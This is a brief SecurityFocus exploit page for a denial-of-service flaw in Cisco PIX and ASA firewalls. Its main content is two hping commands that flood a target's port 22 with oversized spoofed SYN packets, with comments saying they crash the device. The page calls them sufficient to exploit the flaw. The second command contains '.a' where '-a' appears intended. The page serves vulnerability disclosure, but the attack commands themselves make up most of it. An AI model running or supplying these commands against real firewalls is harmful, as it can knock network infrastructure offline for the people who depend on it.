Cisco PIX and ASA Multiple Denial of Service, ACL Bypass, and Authentication Bypass Vulnerabilities

An attacker can use readily available network utilities to exploit these issues.

The following example data is sufficient to exploit the denial-of-service issue affecting PIX and ASA:

/*Utilize 1550 blocks on an ASA to trigger a crash...*/
hping --fast -p 22 -w 1518 -S -d 1480 -a 10.22.1.1 10.22.1.2

/* Trigger the vuln a bit faster */
hping --fast -p 22 -w 1518 -S -d 26201 .a 10.22.1.1 10.22.1.2


 

Privacy Statement
Copyright 2010, SecurityFocus